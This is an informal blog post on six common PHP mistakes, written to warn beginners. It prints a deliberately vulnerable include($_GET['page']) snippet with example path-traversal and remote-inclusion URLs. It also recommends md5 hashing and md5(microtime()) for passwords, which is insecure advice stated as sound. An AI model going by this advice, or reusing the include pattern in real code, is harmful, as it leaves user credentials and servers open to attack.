Six common mistakes in PHP

Okay, so PHP is cool, PHP rocks, PHP is easy to learn… However, just because it’s cool and easy doesn’t mean that you know everything about it. There are gurus (YES!!! LOTS OF THEM!!!) and then there are newbies (WHOHOO!!! Why am I so exciting?). As a guru, you know do-and-don’ts. But what if you’re new to PHP? Don’t panic. Here is a list of top six mistakes in PHP (when I say “top” I mean the “most common” things) that I’ve set out based on my own blood-(not-really)-and-sweat experience.

1. No or little understanding about HTTP methods

What’s the point here?

Everybody uses form, but not everybody knows what “GET” and “POST” really do. As a result, many PHP developers tend to get user’s input data from $_REQUEST, thinking “oh, whatever you send, I’ll catch ‘em all”. That’s not so good, really. Think about $_REQUEST as a merge between $_GET and $_POST, now instead of posting through a form, a user can just attach his (malicious) data via the query string, press Enter, and you’re doomed.

How to fix?

You should spent some extra time to learn what GET and POST are, and what they’re doing with the web (well then, after some careful studying you may find that it’s not really secure using POST, since a medium user can easily fake POST data too, but it’s a different story).

Also note that sometimes PHP’s $_GET and $_POST don’t contain any of the input data. This likely happens in a server-to-server data transfer, and now you must parse the raw data yourself, instead of relying on PHP parser. Something like $data = file_get_contents(’php://input’); if you’re ready with that.

2. Little understanding on PHP types

Yes, what’s so bad?

As a newbie, especially if you’re coming from another strong-typed language like C#, you may find it confused with types in PHP. Then, you don’t know how to do a good comparison operator, neither can you be sure if that 500-line-of-code function returns the correct data type you need. The result? Your PHP code is messy, with unnecessary lines and comments (yeah, comments are good, but only if you don’t overuse them).

How to fix?

Actually it’s not about fixing. Read more, practise more, until you (and your boss) consider yourself OK. If you want to make sure it’s a string, an array etc., make use of PHP’s built-in range of “is_” functions, like is_array, is_string, is_null… If you want an exact comparison, keep in mind that weird “===” operator. Remember that empty($var) returns boolean TRUE with a null, 0 (number), ‘0′ (the string 0), ” (an empty string), an array with no elements, a non-asigned variable, and the FALSE itself. Play around, it’s the key.

3. Misunderstanding about (external) file including

Huh?

Like, you create two common files call “header.inc.php” and “footer.inc.php”. Also you put a “functions.inc.php” and “database.class.php” into play. Now with each page, you include() the four php files. Isn’t it fast? convenience? easy to maintain?

YES!!! You rock!!! That’s the way it should be!!!

But wait. Do you know that everything has its own risks? No? Go ask here.

Just kidding. The thing is, PHP offers many methods to including another file into your current script. And you should take all of them into account, or open your doors saying “Hi, Mister Exploit, my pleasure to meet you!”.

How?

Not that complex. In PHP to include a file, we have at least four ways, include(), include_once(), require(), and require_once(), all accept a string as the file path/name to include and evaluate it. However, they’re different. Little, but can kill.

If you’re trying to include() a missing file, a Warning will be produced, and your script continues. This is sometimes what we want, sometimes not. On the opposite, we have require() which terminates the whole script if there’s any problem with the to-be-included file. Again, sometimes we like it NOT, sometimes we do.

An include_once is equivalent to include(), except that if the file has been included, it won’t be included (and executed) again. The same goes with require_once and require(). This is extremely important, as re-declaring a function in PHP (for now) simply generates a Fatal error. Not what you want, yes?

So isn’t it safer to use include_once() or require_once() all the time? The answer is No. Everything has a price, and in PHP it’s the performance. You must trade your speed for this convenience, so think twice.

Also some tend to use this portion of code:

if (!isset($_GET['page']))
{
    goToIndexPage();
}
else
{
    if (file_exists($_GET['page']))
    {
        include($_GET['page']);
    }
}

What does this code do? It acts as a simple front controller, which accepts a “page” parameter via GET. So if the user goes to yoursite.com/?page=news, you’ll serve him your news.php file. Very handy, indeed.

But wait, what if a user by any “accident” wants to go to yoursite.com/?page=../../etc/password? Do you want to serve that guy your password file? I doubt that.

And if allow_url_fopen is turned on in your php.ini, he may wants to visit yoursite.com/?page=http://hissite.com/devil.php… Kaboom! Think about it.

4. Not using any encryption

The problem

Once in a while I work as a freelancer, and my jobs are very often done on an existing site - you know, improving, enhancing, fix bugs, whatever it’s called. And it beats me to see that 50% of the cases, the passwords and other sensitive information are saved nakedly in the database, for any naked eyes to see. Not only it’s a serious security problem, it also hurts policy. You can be sued! Be very afraid!

The fix

Encryption (here I use the term in a common way, ignoring that encrypting and hashing are different) methods are dead simple in PHP. What does it take to encrypt a string in PHP using md5? One line of code:

$my_string = 'I am a very sensitive info. Encrypt me please!'; 
// You can md5 the string normally. This is that one line
$encrypted = md5($my_string); 
// or use a simple yet very efficient technology call "salting"
define('MD5_SALT', 'A string No one can GuEss');
$encrypted = md5($my_string . MD5_SALT);

There! You now have a nearly-impossible-to-decrypt string contained in $encrypted variable. That’s called md5 hashing. How complicated is that? Now save the passwords in encrypted form into database, and sleep well at night. Without a mighty server AND some thousand years, no one can discover your secret behind those 32 characters. Later, if you want to authorize a user for example, hash the typed in password with the same salt and compare the result with the value stored.

There is however one catch with this method: password retrieving feature. No, you simply can’t decrypt the hashed string to give back the password to that absent-minded Bob. As an alternative method, you will have to create another random password for him. This is what I’m doing now:

// generate a random string based on the microtime value
$random_string = md5(microtime()); 
// now as the string is 32 charaters in length, chop it a bit
// let's say 6 first characters
$new_password = substring($random_string, 0, 6); 
// save the new password into database. Remember to encrypt it!!!
saveToDatabase(md5($new_password)); 
// mail Bob

If you prefer returning the old password to our Bob, considering two-way encrypting libraries like mcrypt.

5. Little care about optimization

The situation

You’re developing a good site. It’s cuil - you know what I mean. People know it. Many guys start contributing by writing you good articles. You receive 372 comments with each post. You begin to place ads and earn some money. Wind blows, water flows, men go, dogs bo-wo (that’s how dogs are barking in my country), till one morning you wake up and recognize that it takes five minutes for your website to generate and display a news about Steve Jobs’ heartache. What happened? You can swear that it USED to be lightning fast just ONE MONTH ago! What the hell happened?

The (possibly) cause

Everybody can write code, but not all can/take time to optimize it. According to Wikipedia, optimization is “the process of modifying a system to make some aspect of it work more efficiently or use fewer resources”. The fewer the resources are, the faster your site is. Take a look at this code:

$my_string = "I will blah 100 times: ";
for ($i = 0; $i < 100; ++$i)
{
    $my_string .= "blah";
}
echo $my_string;
exit();

When it doesn’t look so bad, there are at least 3 problems within those only 7 lines of code above:

  1. Improper use of double quotes (2 times). As PHP will try to parse variables in a double quoted string, it will certainly take extra time to assign “This string” compared to ‘This string’ into a variable.
  2. Not making use of the built-in function str_repeat(). Built-in functions are ALWAYS faster.
  3. The 2 final lines can be combined into one.

Now take a look at this:

$my_string = 'I will blah 100 times: ';
exit($my_string . str_repeat('blah', 100));

How does that look like? Not only it’s shorter, it’s also way cleaner and well optimized. The difference may not be significant in a small idle site, but in a big enterprise application, every bit is gold. So take out the unnecessary code, try to find an equivalent built-in function for that 100 lines of code, try combining your statements, and so on - here is a very good tutorial on this topic. Once you think that your code is perfect, it’s time to considering database optimization, but I’ll talk about it in another post, not here, not now.

6. Little care about the successors

Successors? Who are they?

They are the next guys to work with your PHP code (maybe your son, your senior, yourself, or even me).

I’ve seen quite a few of developers who write code like tomorrow’s the end of the world. To name a few:

  • No comments or comments are written in Sanskrit. No, I don’t know Sanskrit, neither my dad, neither my Indian buddy Yousuf. I can’t even read French. I’m dead. Help!!!
  • Using short tags (<? ?> instead of <?php ?>). What if one day your site moves to another host where short tag was disabled? What if PHP (very likely) decides to remove short tag support from the next version?
  • Not using a framework. Agreed, there are sites and pages that are too simple, when a framework just means “bloated”. But in other cases, a good framework can only help. It standardizes the way you code, it has security measures, and it’s fast to develop. Learning to use a framework is definitely not a pain in the ass, and there are plenty out there: Zend, Cake, CodeIgniter, Seagull etc.
  • Encrypt your code. Unless you are going to sell your code and giving out a demo, you don’t need such security. It’s gonna be hell when you lose the encryption key. Worst.hell.ever.

Science has it that our beautiful earth will only vanish after at least 500 million more years. It’s not very near a future, so when you write your code, think about the guys who will be in charge of it tomorrow, and they will thank you.


You can follow any responses to this entry through the RSS 2.0 feed.